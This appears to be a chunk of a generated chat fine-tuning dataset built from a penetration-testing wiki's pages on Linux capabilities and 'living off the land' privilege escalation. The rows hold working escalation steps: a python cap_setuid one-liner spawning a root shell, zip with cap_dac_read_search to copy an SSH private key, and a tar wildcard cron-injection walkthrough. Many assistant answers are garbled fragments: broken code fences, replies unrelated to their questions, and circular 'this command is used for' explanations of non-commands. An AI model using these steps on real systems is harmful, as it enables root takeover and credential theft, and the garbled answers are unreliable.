any capability from any set\n * move capabilities from permitted/inherited sets to effective set\n* If a thread calls execve() on a binary file, its capabilities will be modified following the pattern described in the man pages (see man capabilities).\n\nNon-exhaustive capability list :\n\n| Capability | Description |\n| ----------------------- | -------------------------------------------------- |\n| CAP_AUDIT_CONTROL | Toggle kernel auditing |\n| CAP_AUDIT_WRITE | Write to kernel audit log |\n| CAP_CHOWN | Change file owners |\n| CAP_SETUID/CAP_SETGID | Change UID/GID |\n| CAP_NET_RAW | Open raw and packet sockets |\n| CAP_NET_BIND_SERVICE | Bind a socket to Internet domain privileged ports |"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Capabilities - Capability inheritance, capability drop", "response": "* On fork() call, the child thread will have the same capabilities as the parent thread.\n* capset() syscall allows to\n * drop any capability from any set\n * move capabilities from permitted/inherited sets to effective set\n* If a thread calls execve() on a binary file, its capabilities will be modified following the pattern described in the man pages (see man capabilities).\n\nNon-exhaustive capability list :\n\n| Capability | Description |\n| ----------------------- | -------------------------------------------------- |\n| CAP_AUDIT_CONTROL | Toggle kernel auditing |\n| CAP_AUDIT_WRITE | Write to kernel audit log |\n| CAP_CHOWN | Change file owners |\n| CAP_SETUID/CAP_SETGID | Change UID/GID |\n| CAP_NET_RAW | Open raw and packet sockets |\n| CAP_NET_BIND_SERVICE | Bind a socket to Internet domain privileged ports |", "metadata": {"corpus_index": 1409, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Capabilities - Practice"}, {"role": "assistant", "content": "Setting a file's capabilities :\n\nTo change capabilities on a file, you need to type these commands as root :\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Capabilities - Practice", "response": "Setting a file's capabilities :\n\nTo change capabilities on a file, you need to type these commands as root :\n\n```bash", "metadata": {"corpus_index": 1410, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Capabilities - Practice"}, {"role": "assistant", "content": "Setting a file's capabilities :\n\nTo change capabilities on a file, you need to type these commands as root :\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Capabilities - Practice", "response": "Setting a file's capabilities :\n\nTo change capabilities on a file, you need to type these commands as root :\n\n```bash", "metadata": {"corpus_index": 1410, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about listing & decoding a running process' capabilities"}, {"role": "assistant", "content": "grep Cap /proc/$pid/status\ncapsh --decode=000001ffffffffff\n``\n\nExploiting capabilities :\n\n* Empty capabilities\n\n If a file has capabilities /path/to/file =ep it means it has all capabilities _and_ will run as root.\n\n> [!TIP]\n> To create a file with empty (=all) capabilities justsudo setcap \\=ep /path/to/file \n\nOther classic examples :\n\n* If the python binary has the cap_setuid then it becomes trivial to get a root shell :\n\n`bash\n./python -c \"import os; os.setuid(0); os.system('/bin/sh')\"\n`\n\n* Arbitrary file read : zip with cap_dac_read_search\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about listing & decoding a running process' capabilities", "response": "grep Cap /proc/$pid/status\ncapsh --decode=000001ffffffffff\n``\n\nExploiting capabilities :\n\n* Empty capabilities\n\n If a file has capabilities /path/to/file =ep it means it has all capabilities _and_ will run as root.\n\n> [!TIP]\n> To create a file with empty (=all) capabilities justsudo setcap \\=ep /path/to/file \n\nOther classic examples :\n\n* If the python binary has the cap_setuid then it becomes trivial to get a root shell :\n\n`bash\n./python -c \"import os; os.setuid(0); os.system('/bin/sh')\"\n`\n\n* Arbitrary file read : zip with cap_dac_read_search\n\n``bash", "metadata": {"corpus_index": 1411, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for listing & decoding a running process' capabilities?"}, {"role": "assistant", "content": "grep Cap /proc/$pid/status\ncapsh --decode=000001ffffffffff\n``\n\nExploiting capabilities :\n\n* Empty capabilities\n\n If a file has capabilities /path/to/file =ep it means it has all capabilities _and_ will run as root.\n\n> [!TIP]\n> To create a file with empty (=all) capabilities justsudo setcap \\=ep /path/to/file \n\nOther classic examples :\n\n* If the python binary has the cap_setuid then it becomes trivial to get a root shell :\n\n`bash\n./python -c \"import os; os.setuid(0); os.system('/bin/sh')\"\n`\n\n* Arbitrary file read : zip with cap_dac_read_search\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for listing & decoding a running process' capabilities?", "response": "grep Cap /proc/$pid/status\ncapsh --decode=000001ffffffffff\n``\n\nExploiting capabilities :\n\n* Empty capabilities\n\n If a file has capabilities /path/to/file =ep it means it has all capabilities _and_ will run as root.\n\n> [!TIP]\n> To create a file with empty (=all) capabilities justsudo setcap \\=ep /path/to/file \n\nOther classic examples :\n\n* If the python binary has the cap_setuid then it becomes trivial to get a root shell :\n\n`bash\n./python -c \"import os; os.setuid(0); os.system('/bin/sh')\"\n`\n\n* Arbitrary file read : zip with cap_dac_read_search\n\n``bash", "metadata": {"corpus_index": 1411, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the Exploiting syntax for listing & decoding a running process' capabilities?"}, {"role": "assistant", "content": "Exploiting capabilities :\n\n* Empty capabilities\n\n If a file has capabilities `/path/to/file =ep` it means it has `all` capabilities _and_ will run as `root`.\n\n> [!TIP]\n> To create a file with empty (=all) capabilities just`sudo setcap \\=ep /path/to/file` \n\nOther classic examples :\n\n* If the `python` binary has the `cap_setuid` then it becomes trivial to get a root shell :"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the Exploiting syntax for listing & decoding a running process' capabilities?", "response": "Exploiting capabilities :\n\n* Empty capabilities\n\n If a file has capabilities `/path/to/file =ep` it means it has `all` capabilities _and_ will run as `root`.\n\n> [!TIP]\n> To create a file with empty (=all) capabilities just`sudo setcap \\=ep /path/to/file` \n\nOther classic examples :\n\n* If the `python` binary has the `cap_setuid` then it becomes trivial to get a root shell :", "metadata": {"corpus_index": 1412, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Exploiting"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for listing & decoding a running process' capabilities"}, {"role": "assistant", "content": "Exploiting capabilities :\n\n* Empty capabilities\n\n If a file has capabilities `/path/to/file =ep` it means it has `all` capabilities _and_ will run as `root`.\n\n> [!TIP]\n> To create a file with empty (=all) capabilities just`sudo setcap \\=ep /path/to/file` \n\nOther classic examples :\n\n* If the `python` binary has the `cap_setuid` then it becomes trivial to get a root shell :"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for listing & decoding a running process' capabilities", "response": "Exploiting capabilities :\n\n* Empty capabilities\n\n If a file has capabilities `/path/to/file =ep` it means it has `all` capabilities _and_ will run as `root`.\n\n> [!TIP]\n> To create a file with empty (=all) capabilities just`sudo setcap \\=ep /path/to/file` \n\nOther classic examples :\n\n* If the `python` binary has the `cap_setuid` then it becomes trivial to get a root shell :", "metadata": {"corpus_index": 1412, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Exploiting capabilities :`?"}, {"role": "assistant", "content": "This command is used for listing & decoding a running process' capabilities. listing & decoding a running process' capabilities"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Exploiting capabilities :`?", "response": "This command is used for listing & decoding a running process' capabilities. listing & decoding a running process' capabilities", "metadata": {"corpus_index": 1412, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute listing & decoding a running process' capabilities?"}, {"role": "assistant", "content": "* Arbitrary file read : `zip` with `cap_dac_read_search`"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute listing & decoding a running process' capabilities?", "response": "* Arbitrary file read : `zip` with `cap_dac_read_search`", "metadata": {"corpus_index": 1413, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `* Arbitrary file read : `zip` with `cap_dac_read_search``?"}, {"role": "assistant", "content": "This command is used for listing & decoding a running process' capabilities. listing & decoding a running process' capabilities"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `* Arbitrary file read : `zip` with `cap_dac_read_search``?", "response": "This command is used for listing & decoding a running process' capabilities. listing & decoding a running process' capabilities", "metadata": {"corpus_index": 1413, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about cap_dac_read_search allows zip/tar to read any file (get ssh private key here)"}, {"role": "assistant", "content": "zip /tmp/private_k.zip ~/.ssh/id_rsa\nunzip /tmp/private_k.zip -d /tmp"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about cap_dac_read_search allows zip/tar to read any file (get ssh private key here)", "response": "zip /tmp/private_k.zip ~/.ssh/id_rsa\nunzip /tmp/private_k.zip -d /tmp", "metadata": {"corpus_index": 1414, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for cap_dac_read_search allows zip/tar to read any file (get ssh private key here)"}, {"role": "assistant", "content": "zip /tmp/private_k.zip ~/.ssh/id_rsa\nunzip /tmp/private_k.zip -d /tmp"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for cap_dac_read_search allows zip/tar to read any file (get ssh private key here)", "response": "zip /tmp/private_k.zip ~/.ssh/id_rsa\nunzip /tmp/private_k.zip -d /tmp", "metadata": {"corpus_index": 1414, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain id_rsa is now readable in the unzipped folder"}, {"role": "assistant", "content": "``\n\nEnd notes :\n\nWhen copied from one place to another, a binary will lose its capabilities. In order to keep capabilities, you can copy the file with --preserve=all option :\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain id_rsa is now readable in the unzipped folder", "response": "``\n\nEnd notes :\n\nWhen copied from one place to another, a binary will lose its capabilities. In order to keep capabilities, you can copy the file with --preserve=all option :\n\n``bash", "metadata": {"corpus_index": 1415, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on id_rsa is now readable in the unzipped folder"}, {"role": "assistant", "content": "``\n\nEnd notes :\n\nWhen copied from one place to another, a binary will lose its capabilities. In order to keep capabilities, you can copy the file with --preserve=all option :\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on id_rsa is now readable in the unzipped folder", "response": "``\n\nEnd notes :\n\nWhen copied from one place to another, a binary will lose its capabilities. In order to keep capabilities, you can copy the file with --preserve=all option :\n\n``bash", "metadata": {"corpus_index": 1415, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the End syntax for id_rsa is now readable in the unzipped folder?"}, {"role": "assistant", "content": "End notes :\n\nWhen copied from one place to another, a binary will lose its capabilities. In order to keep capabilities, you can copy the file with `--preserve=all` option :"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the End syntax for id_rsa is now readable in the unzipped folder?", "response": "End notes :\n\nWhen copied from one place to another, a binary will lose its capabilities. In order to keep capabilities, you can copy the file with `--preserve=all` option :", "metadata": {"corpus_index": 1416, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "End"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do id_rsa is now readable in the unzipped folder"}, {"role": "assistant", "content": "End notes :\n\nWhen copied from one place to another, a binary will lose its capabilities. In order to keep capabilities, you can copy the file with `--preserve=all` option :"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do id_rsa is now readable in the unzipped folder", "response": "End notes :\n\nWhen copied from one place to another, a binary will lose its capabilities. In order to keep capabilities, you can copy the file with `--preserve=all` option :", "metadata": {"corpus_index": 1416, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `End notes :`?"}, {"role": "assistant", "content": "This command is used for id_rsa is now readable in the unzipped folder. id_rsa is now readable in the unzipped folder"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `End notes :`?", "response": "This command is used for id_rsa is now readable in the unzipped folder. id_rsa is now readable in the unzipped folder", "metadata": {"corpus_index": 1416, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/capabilities.md", "page_title": "🛠️ Capabilities", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ Living off the land - Theory in the context of penetration testing"}, {"role": "assistant", "content": "Living of the Land is a well known privilege escalation technique, where an attacker will leverage binaries found on the attacked machine to perform a privilege escalation. Indeed, many UNIX programs have options that can be exploited to open a shell. Therefore if we can start the program we exploit as another user, we might be able to open a shell as this user ! \n\nMost of the payloads to do this on UNIX programs can be found on gtfobins.github.io."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ Living off the land - Theory in the context of penetration testing", "response": "Living of the Land is a well known privilege escalation technique, where an attacker will leverage binaries found on the attacked machine to perform a privilege escalation. Indeed, many UNIX programs have options that can be exploited to open a shell. Therefore if we can start the program we exploit as another user, we might be able to open a shell as this user ! \n\nMost of the payloads to do this on UNIX programs can be found on gtfobins.github.io.", "metadata": {"corpus_index": 1417, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Living off the land - Theory during a pentest?"}, {"role": "assistant", "content": "Living of the Land is a well known privilege escalation technique, where an attacker will leverage binaries found on the attacked machine to perform a privilege escalation. Indeed, many UNIX programs have options that can be exploited to open a shell. Therefore if we can start the program we exploit as another user, we might be able to open a shell as this user ! \n\nMost of the payloads to do this on UNIX programs can be found on gtfobins.github.io."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Living off the land - Theory during a pentest?", "response": "Living of the Land is a well known privilege escalation technique, where an attacker will leverage binaries found on the attacked machine to perform a privilege escalation. Indeed, many UNIX programs have options that can be exploited to open a shell. Therefore if we can start the program we exploit as another user, we might be able to open a shell as this user ! \n\nMost of the payloads to do this on UNIX programs can be found on gtfobins.github.io.", "metadata": {"corpus_index": 1417, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ Living off the land - Practice?"}, {"role": "assistant", "content": "Here are two case study to better understand the principle of these privilege escalations :"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ Living off the land - Practice?", "response": "Here are two case study to better understand the principle of these privilege escalations :", "metadata": {"corpus_index": 1418, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Living off the land - Practice?"}, {"role": "assistant", "content": "Here are two case study to better understand the principle of these privilege escalations :"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Living off the land - Practice?", "response": "Here are two case study to better understand the principle of these privilege escalations :", "metadata": {"corpus_index": 1418, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ Living off the land - Case study 1 : Privesc using tar and a cronjob work?"}, {"role": "assistant", "content": "Imagine a scenario where a script backups a directory (that we can control) on the server each hour using tar like this :\n\n``\n#!/bin/bash\n\nmkdir -p /backups/\ncd /var/www/html/ && tar cvzf /backups/backup_$(date +%Y_%m_%d_%Hh%M).tar.gz *\n`\n\nNotice this interesting pattern tar czvf file.tar.gz * in the script. This is a security vulnerability because of how UNIX shells handles wildcards. Let's see an example with the ls command :\n\n`\n$ ls -lha\ntotal 84K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n$ ls *\nfile1 file2 file3\n\n$ echo '' > '-lha'\n$ ls -lha \ntotal 88K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n-rw-rw-r-- 1 user user 1 avril 27 22:32 -lha\n$ ls *\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n`\n\nThe shell wildcards are resolved by the shell, and not by the command. This means filenames can be treated as options if they are starting with a -. In our previous example, we added a file called -lha into the folder. When we type ls , the shell replaces the by all matching files in the current directory, and therefore our command becomes ls file1 file2 file3 -lha. After the wildcard resolution, the shell executes the command with our options.\n\nNow if we get back to our script creating a backup of a directory each our with tar *, we see that tar have legitimate options allowing execution of a program. You can find them here :\n\n* https://gtfobins.github.io/gtfobins/tar/#shell\n\nTo use these options in our exploit, we jut need to create these two files in our directory, as well as the exploit.sh file, containing the c"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ Living off the land - Case study 1 : Privesc using tar and a cronjob work?", "response": "Imagine a scenario where a script backups a directory (that we can control) on the server each hour using tar like this :\n\n``\n#!/bin/bash\n\nmkdir -p /backups/\ncd /var/www/html/ && tar cvzf /backups/backup_$(date +%Y_%m_%d_%Hh%M).tar.gz *\n`\n\nNotice this interesting pattern tar czvf file.tar.gz * in the script. This is a security vulnerability because of how UNIX shells handles wildcards. Let's see an example with the ls command :\n\n`\n$ ls -lha\ntotal 84K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n$ ls *\nfile1 file2 file3\n\n$ echo '' > '-lha'\n$ ls -lha \ntotal 88K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n-rw-rw-r-- 1 user user 1 avril 27 22:32 -lha\n$ ls *\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n`\n\nThe shell wildcards are resolved by the shell, and not by the command. This means filenames can be treated as options if they are starting with a -. In our previous example, we added a file called -lha into the folder. When we type ls , the shell replaces the by all matching files in the current directory, and therefore our command becomes ls file1 file2 file3 -lha. After the wildcard resolution, the shell executes the command with our options.\n\nNow if we get back to our script creating a backup of a directory each our with tar *, we see that tar have legitimate options allowing execution of a program. You can find them here :\n\n* https://gtfobins.github.io/gtfobins/tar/#shell\n\nTo use these options in our exploit, we jut need to create these two files in our directory, as well as the exploit.sh file, containing the c", "metadata": {"corpus_index": 1419, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Living off the land - Case study 1 : Privesc using tar and a cronjob"}, {"role": "assistant", "content": "Imagine a scenario where a script backups a directory (that we can control) on the server each hour using tar like this :\n\n``\n#!/bin/bash\n\nmkdir -p /backups/\ncd /var/www/html/ && tar cvzf /backups/backup_$(date +%Y_%m_%d_%Hh%M).tar.gz *\n`\n\nNotice this interesting pattern tar czvf file.tar.gz * in the script. This is a security vulnerability because of how UNIX shells handles wildcards. Let's see an example with the ls command :\n\n`\n$ ls -lha\ntotal 84K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n$ ls *\nfile1 file2 file3\n\n$ echo '' > '-lha'\n$ ls -lha \ntotal 88K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n-rw-rw-r-- 1 user user 1 avril 27 22:32 -lha\n$ ls *\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n`\n\nThe shell wildcards are resolved by the shell, and not by the command. This means filenames can be treated as options if they are starting with a -. In our previous example, we added a file called -lha into the folder. When we type ls , the shell replaces the by all matching files in the current directory, and therefore our command becomes ls file1 file2 file3 -lha. After the wildcard resolution, the shell executes the command with our options.\n\nNow if we get back to our script creating a backup of a directory each our with tar *, we see that tar have legitimate options allowing execution of a program. You can find them here :\n\n* https://gtfobins.github.io/gtfobins/tar/#shell\n\nTo use these options 